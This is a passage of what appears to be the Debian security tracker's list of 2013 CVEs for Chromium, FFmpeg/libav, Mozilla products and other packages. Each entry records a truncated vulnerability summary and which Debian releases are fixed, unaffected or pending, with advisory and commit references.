...) {DSA-2786-1} - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser - icu 4.8.1.1-12 (low; bug #702346) [squeeze] - icu (Minor issue for standalone ICU outside of browser context) CVE-2013-0899 (Integer overflow in the padding implementation in the opus_packet_pars ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser - opus 0.9.14+20120615-1+nmu1 (bug #704870) CVE-2013-0898 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on W ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0897 (Off-by-one error in the PDF functionality in Google Chrome before 25.0 ...) - chromium-browser (PDF viewer not included in Chromium) [squeeze] - chromium-browser CVE-2013-0896 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0895 (Google Chrome before 25.0.1364.97 on Linux, and before 25.0.1364.99 on ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0894 (Buffer overflow in the vorbis_parse_setup_hdr_floors function in the V ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.6-1 (bug #703200) CVE-2013-0893 (Race condition in Google Chrome before 25.0.1364.97 on Windows and Lin ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0892 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0891 (Integer overflow in Google Chrome before 25.0.1364.97 on Windows and L ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0890 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0889 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0888 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linu ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0887 (The developer-tools process in Google Chrome before 25.0.1364.97 on Wi ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0886 (Google Chrome before 25.0.1364.99 on Mac OS X does not properly implem ...) - chromium-browser (Mac OS X only) [squeeze] - chromium-browser CVE-2013-0885 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0884 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0883 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linu ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0882 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0881 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0880 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on W ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0879 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0878 (The advance_line function in libavcodec/targa.c in FFmpeg before 1.1.3 ...) - ffmpeg (Affected code not present in 0.5 ffmpeg) - libav (Affected code not present in libav) CVE-2013-0877 (The old_codec37 function in libavcodec/sanm.c in FFmpeg before 1.1.3 a ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0876 (Multiple integer overflows in the (1) old_codec37 and (2) old_codec47 ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0875 (The ff_add_png_paeth_prediction function in libavcodec/pngdec.c in FFm ...) - ffmpeg (Affected code not present in 0.5 ffmpeg) - libav (Affected code not present in libav) CVE-2013-0874 (The (1) doubles2str and (2) shorts2str functions in libavcodec/tiff.c ...) - ffmpeg (Affected code not present in 0.5 ffmpeg) - libav (Affected code not present in libav) CVE-2013-0873 (The read_header function in libavcodec/shorten.c in FFmpeg before 1.1. ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.6-1 (bug #717009) NOTE: Commit in libav trunk http://git.libav.org/?p=libav.git;a=commit;h=c10da30d8426a1f681d99a780b6e311f7fb4e5c5 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=4f1279154ee9baf2078241bf5619774970d18b25 NOTE: Fix needed for ffmpeg 0.5 CVE-2013-0872 (The swr_init function in libswresample/swresample.c in FFmpeg before 1 ...) - ffmpeg (libswresample not yet present in ffmpeg/0.5) - libav (libswresample not present in libav, linavresamle not affected) CVE-2013-0871 (Race condition in the ptrace functionality in the Linux kernel before ...) {DSA-2632-1} - linux 3.2.39-1 - linux-2.6 CVE-2013-0870 (The 'vp3_decode_frame' function in FFmpeg 1.1.4 moves threads check ou ...) - ffmpeg (No threading support in vp3 from ffmpeg 0.5) - libav (Vulnerable code added in ffmpeg post-merge) CVE-2013-0869 (The field_end function in libavcodec/h264.c in FFmpeg before 1.1.2 all ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.5-1 NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=706acb558a38eba633056773280155d66c2f4b24 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=695af8eed642ff0104834495652d1ee784a4c14d NOTE: Fix needed in ffmpeg 0.5 CVE-2013-0868 (libavcodec/huffyuvdec.c in FFmpeg before 1.1.2 allows remote attackers ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.3-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=f67a0d115254461649470452058fa3c28c0df294 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=0dfc01c2bbf4b71bb56201bc4a393321e15d1b31 CVE-2013-0867 (The decode_slice_header function in libavcodec/h264.c in FFmpeg before ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav (Code in libav is different/not affect as per libav h264 maintainer) NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=11c99c78bafa77f679a1a3ba06ad00984b9a4cae CVE-2013-0866 (The aac_decode_init function in libavcodec/aacdec.c in FFmpeg before 1 ...) {DSA-2793-1} - ffmpeg (Code in 0.5 is different/not affected) - libav 6:0.8.7-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=96f452ac647dae33c53c242ef3266b65a9beafb6 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=a943a132f36f4df8fe2f749744677b71984abce7 CVE-2013-0865 (The vqa_decode_chunk function in libavcodec/vqavideo.c in FFmpeg befor ...) {DSA-2855-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.8-1 (bug #717009) NOTE: libav commit: http://git.libav.org/?p=libav.git;a=commit;h=f7d18deb73d1dd1b27b2c7062c9a10d168a6c62a CVE-2013-0864 (The gif_copy_img_rect function in libavcodec/gifdec.c in FFmpeg before ...) - ffmpeg (These changes are specific to current ffmpeg and don't affect ffmpeg 0.5) - libav ((These changes are specific to ffmpeg and don't affect libav) CVE-2013-0863 (Buffer overflow in the rle_decode function in libavcodec/sanm.c in FFm ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0862 (Multiple integer overflows in the process_frame_obj function in libavc ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0861 (The avcodec_decode_audio4 function in libavcodec/utils.c in FFmpeg bef ...) - ffmpeg (These changes are specific to current ffmpeg and don't affect ffmpeg 0.5) - libav (Affected code not present in libav 0.8.x) NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=d270c3202539e8364c46410e15f7570800e33343 NOTE: Affects the libav version in experimental CVE-2013-0860 (The ff_er_frame_end function in libavcodec/error_resilience.c in FFmpe ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.1-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=23318a57358358e7a4dc551e830e4503f0638cfe NOTE: [Vittorio] not present in master and 10, fix pushed to 9 and 0.8 CVE-2013-0859 (The add_doubles_metadata function in libavcodec/tiff.c in FFmpeg befor ...) - ffmpeg (These changes are specific to current ffmpeg and don't affect ffmpeg 0.5) - libav ((These changes are specific to ffmpeg and don't affect libav) CVE-2013-0858 (The atrac3_decode_init function in libavcodec/atrac3.c in FFmpeg befor ...) {DSA-2793-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.9-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=13451f5520ce6b0afde861b2285dda659f8d4fb4 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=50cf5a7fb78846fc39b3ecdaa896a10bcd74da2a NOTE: Fixed in 0.8.9 CVE-2013-0857 (The decode_frame_ilbm function in libavcodec/iff.c in FFmpeg before 1. ...) {DSA-2793-1} - ffmpeg (IFF PBM/ILBM bitmap decoder not present in 0.5 ffmpeg) - libav 6:9.9-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=2fbb37b51bbea891392ad357baf8f3dff00bac05 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=7d65e960c72f36b73ae7fe84f8e427d758e61da9 NOTE: Fixed in 0.8.9 CVE-2013-0856 (The lpc_prediction function in libavcodec/alac.c in FFmpeg before 1.1 ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.10-1 [wheezy] - libav (Vulnerable code not present) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=fd4f4923cce6a2cbf4f48640b4ac706e614a1594 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=78aa2ed620178044a227fbbe48f749c0dc86023f CVE-2013-0855 (Integer overflow in the alac_decode_close function in libavcodec/alac. ...) - ffmpeg (0.5 series not affected) - libav 6:9.9-1 (bug #717009) [wheezy] - libav (0.8 series not affected) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=3920d1387834e2bc334aff9f518f4beb24e470bd NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=f7c5883126f9440547933eefcf000aa78af4821c CVE-2013-0854 (The mjpeg_decode_scan_progressive_ac function in libavcodec/mjpegdec.c ...) {DSA-2793-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.8-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=1f41cffe1e3e79620f587545bdfcbd7e6e68ed29 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=cfbd98abe82cfcb9984a18d08697251b72b110c8 CVE-2013-0853 (The wavpack_decode_frame function in libavcodec/wavpack.c in FFmpeg be ...) {DSA-2793-1} - ffmpeg (Vulnerability introduced later) - libav 6:0.8.8-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=be818df547c3b0ae4fadb50fd210139a8636706a NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=ed50673066956d6f2201a57c3254569f2ab08d9d CVE-2013-0852 (The parse_picture_segment function in libavcodec/pgssubdec.c in FFmpeg ...) {DSA-3003-1} - ffmpeg (PGS subtitle decoder not present) - libav 6:10.3-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=c0d68be555f5858703383040e04fcd6529777061 CVE-2013-0851 (The decode_frame function in libavcodec/eamad.c in FFmpeg before 1.1 a ...) {DSA-3003-1} - ffmpeg (Electronic Arts Madcow Video decoder not present in ffmpeg 0.5) - libav 6:10.3-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=63ac64864c6e0e84355aa3caa5b92208997a9a8d NOTE: https://git.libav.org/?p=libav.git;a=commit;h=f9204ec56a4cf73843d1e5b8563d3584c2c05b47 (v10) NOTE: https://git.libav.org/?p=libav.git;a=commit;h=e8ff7972064631afbdf240ec6bfd9dec30cf2ce8 (v9) NOTE: https://git.libav.org/?p=libav.git;a=commit;h=187cfd3c13a1deb47661486824a5b8f41e158a7a (v0.8) CVE-2013-0850 (The decode_slice_header function in libavcodec/h264.c in FFmpeg before ...) {DSA-2793-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.7-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=d6c184880ee2e09fd68c0ae217173832cee5afc1 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=6e5cdf26281945ddea3aaf5eca4d127791f23ca8 CVE-2013-0849 (The roq_decode_init function in libavcodec/roqvideodec.c in FFmpeg bef ...) {DSA-2855-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.3-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=3ae610451170cd5a28b33950006ff0bd23036845 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=488f87be873506abb01d67708a67c10a4dd29283 CVE-2013-0848 (The decode_init function in libavcodec/huffyuv.c in FFmpeg before 1.1 ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.4-1 NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=6abb9a901fca27da14d4fffbb01948288b5da3ba NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=a7153444df9040bf6ae103e0bbf6104b66f974cb CVE-2013-0847 (The ff_id3v2_parse function in libavformat/id3v2.c in FFmpeg before 1. ...) - ffmpeg (Affected code not present in ffmpeg 0.5) - libav (Code in libav is different, read_ttag) NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=10416a4d56fa8a89784e4fb62099c3cab17a9952 CVE-2013-0846 (Array index error in the qdm2_decode_super_block function in libavcode ...) {DSA-2855-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.3-1 (bug #717009) NOTE: ffmpeg commit: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=a7ee6281f7ef1c29284e3a4cadfe0f227ffde1ed NOTE: libav commit: http://git.libav.org/?p=libav.git;a=commit;h=39bec05ed42e505d17877b0c23f16322f9b5883b NOTE: Needed for ffmpeg 0.5 CVE-2013-0845 (libavcodec/alsdec.c in FFmpeg before 1.0.4 allows remote attackers to ...) {DSA-2855-1} - ffmpeg (MPEG-4 ALS decoder not present in ffmpeg/0.5) - libav 6:9.11-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=0ceca269b66ec12a23bf0907bd2c220513cdbf16 NOTE: Fixed in revisions: v9-2748-g2a0fb72, v9.10-7-g3f7d890 NOTE: http://git.libav.org/?p=libav.git;a=commitdiff;h=2a0fb72 NOTE: http://git.libav.org/?p=libav.git;a=commitdiff;h=3f7d890 CVE-2013-0844 (Off-by-one error in the adpcm_decode_frame function in libavcodec/adpc ...) {DSA-2793-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.10-1 NOTE: ffmpeg commit: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=f18c873ab5ee3c78d00fdcc2582b39c133faecb4 NOTE: libav commit: https://git.libav.org/?p=libav.git;a=commitdiff;h=12576afe206d35231ccd61f9033c5fdab6a11e NOTE: Fixed in 0.8.9 CVE-2013-0843 (content/renderer/media/webrtc_audio_renderer.cc in Google Chrome befor ...) - chromium-browser (MacOS-specific) [squeeze] - chromium-browser CVE-2013-0842 (Google Chrome before 24.0.1312.56 does not properly handle %00 charact ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0841 (Array index error in the content-blocking functionality in Google Chro ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0840 (Google Chrome before 24.0.1312.56 does not validate URLs during the op ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0839 (Use-after-free vulnerability in Google Chrome before 24.0.1312.56 allo ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0838 (Google Chrome before 24.0.1312.52 on Linux uses weak permissions for s ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0837 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a d ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0836 (Google V8 before 3.14.5.3, as used in Google Chrome before 24.0.1312.5 ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser - libv8 (bug #702261; vulnerablility was fixed by reverting to old implementation as found in version 3.8.9.20) CVE-2013-0835 (Unspecified vulnerability in the Geolocation implementation in Google ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0834 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a d ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0833 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a d ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0832 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 allo ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0831 (Directory traversal vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0830 (The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a ...) - chromium-browser (Only affects Windows) [squeeze] - chromium-browser CVE-2013-0829 (Google Chrome before 24.0.1312.52 does not properly maintain database ...) - chromium-browser 24.0.1312.68-1 [squeeze] - chromium-browser CVE-2013-0828 (The PDF functionality in Google Chrome before 24.0.1312.52 does not pr ...) - chromium-browser (PDF functionality not available in Chromium) [squeeze] - chromium-browser CVE-2013-0827 RESERVED CVE-2013-0826 RESERVED CVE-2013-0825 RESERVED CVE-2013-0824 RESERVED CVE-2013-0823 RESERVED CVE-2013-0822 RESERVED CVE-2013-0821 RESERVED CVE-2013-0820 RESERVED CVE-2013-0819 RESERVED CVE-2013-0818 RESERVED CVE-2013-0817 RESERVED CVE-2013-0816 RESERVED CVE-2013-0815 RESERVED CVE-2013-0814 RESERVED CVE-2013-0813 RESERVED CVE-2013-0812 RESERVED CVE-2013-0811 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 al ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0810 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vis ...) NOT-FOR-US: Microsoft CVE-2013-0809 (Unspecified vulnerability in the 2D component in the Java Runtime Envi ...) - openjdk-6 6b27-1.12.4-1 - openjdk-7 7u3-2.1.7-1 CVE-2013-0808 RESERVED CVE-2013-0807 (Cross-site scripting (XSS) vulnerability in the NewSectionPrompt funct ...) NOT-FOR-US: gpEasy CMS CVE-2013-0806 RESERVED CVE-2013-0805 (Multiple cross-site scripting (XSS) vulnerabilities in the search feat ...) NOT-FOR-US: IT Operations Portal CVE-2013-0804 (The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before SP ...) NOT-FOR-US: GroupWise CVE-2013-0803 (A PHP File Upload Vulnerability exists in PolarBear CMS 2.5 via upload ...) NOT-FOR-US: PolarBear CMS CVE-2013-0802 REJECTED CVE-2013-0801 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0800 (Integer signedness error in the pixman_fill_sse2 function in pixman-ss ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape - wine-gecko-1.4 (unimportant) NOTE: The description is misleading: Firefox embeds a copy of Cairo, the interdiff NOTE: shows the respective change at mozilla-esr17/gfx/cairo/cairo/src/cairo-image-surface.c NOTE: Apparently the forked copy has changed, the code isn't present in vanilla Cairo CVE-2013-0799 (Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox ...) - iceweasel (Only affects Firefox on Windows) CVE-2013-0798 (Mozilla Firefox before 20.0 on Android uses world-writable and world-r ...) - iceweasel (Only affects Firefox on Android) CVE-2013-0797 (Untrusted search path vulnerability in the Mozilla Updater in Mozilla ...) - iceweasel (Only affects Firefox on Windows) CVE-2013-0796 (The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x b ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0795 (The System Only Wrapper (SOW) implementation in Mozilla Firefox before ...) {DSA-2720-1 DSA-2699-1} - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape - iceweasel 17.0.5esr-1 [squeeze] - iceweasel [wheezy] - iceape CVE-2013-0794 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17 do not prevent o ...) - iceweasel 17.0.5esr-1 (low) [squeeze] - iceweasel - iceape (low) [squeeze] - iceape [wheezy] - iceape CVE-2013-0793 (Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbi ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0792 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17, when gfx.color_ ...) - iceweasel 17.0.5esr-1 (low) [squeeze] - iceweasel - iceape (low) [squeeze] - iceape [wheezy] - iceape CVE-2013-0791 (The CERT_DecodeCertPackage function in Mozilla Network Security Servic ...) - nss 2:3.14.3-1 (unimportant) NOTE: client crash only CVE-2013-0790 (Unspecified vulnerability in the browser engine in Mozilla Firefox bef ...) - iceweasel (Only affects Firefox on Android) CVE-2013-0789 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 19) - icedove (Only affects Firefox 19) - iceape (Only affects Firefox 19) CVE-2013-0788 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 [squeeze] - iceweasel - iceape [squeeze] - iceape - icedove 17.0.5-1 [squeeze] - icedove [wheezy] - iceape CVE-2013-0787 (Use-after-free vulnerability in the nsEditor::IsPreformatted function ...) {DSA-2699-1} [squeeze] - iceweasel - iceweasel 17.0.5esr-1 - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0786 (The Bugzilla::Search::build_subselect function in Bugzilla 2.x and 3.x ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2013-0785 (Cross-site scripting (XSS) vulnerability in show_bug.cgi in Bugzilla b ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2013-0784 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0783 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 (bug #703071) [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0782 (Heap-based buffer overflow in the nsSaveAsCharset::DoCharsetConversion ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 (bug #703071) [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0781 (Use-after-free vulnerability in the nsPrintEngine::CommonPrint functio ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0780 (Use-after-free vulnerability in the nsOverflowContinuationTracker::Fin ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 (bug #703071) [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0779 (The nsCodingStateMachine::NextState function in Mozilla Firefox before ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0778 (The ClusterIterator::NextCluster function in Mozilla Firefox before 19 ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0777 (Use-after-free vulnerability in the nsDisplayBoxShadowOuter::Paint fun ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0776 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbi ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 (bug #703071) [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0775 (Use-after-free vulnerability in the nsImageLoadingContent::OnStopConta ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 (bug #703071) [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0774 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbi ...) - iceape (Introduced in Firefox 15) - iceweasel (Introduced in Firefox 15) - icedove (Introduced in Firefox 15) CVE-2013-0773 (The Chrome Object Wrapper (COW) and System Only Wrapper (SOW) implemen ...) {DSA-2699-1} - iceweasel 17.0.5esr-1 (bug #703071) [squeeze] - iceweasel - icedove 17.0.5-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-0772 (The RasterImage::DrawFrameTo function in Mozilla Firefox before 19.0, ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0771 (Heap-based buffer overflow in the gfxTextRun::ShrinkToLigatureBoundari ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0770 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0769 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel - icedove 10.0.12-1 [squeeze] - icedove - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0768 (Stack-based buffer overflow in the Canvas implementation in Mozilla Fi ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0767 (The nsSVGPathElement::GetPathLengthScale function in Mozilla Firefox b ...) [squeeze] - iceweasel - iceweasel 10.0.12esr-1 [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0766 (Use-after-free vulnerability in the ~nsHTMLEditRules implementation in ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0765 (Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0764 (The nsSOCKSSocketInfo::ConnectToProxy function in Mozilla Firefox befo ...) - iceape (Doesn't affect the ESR series, only releases from 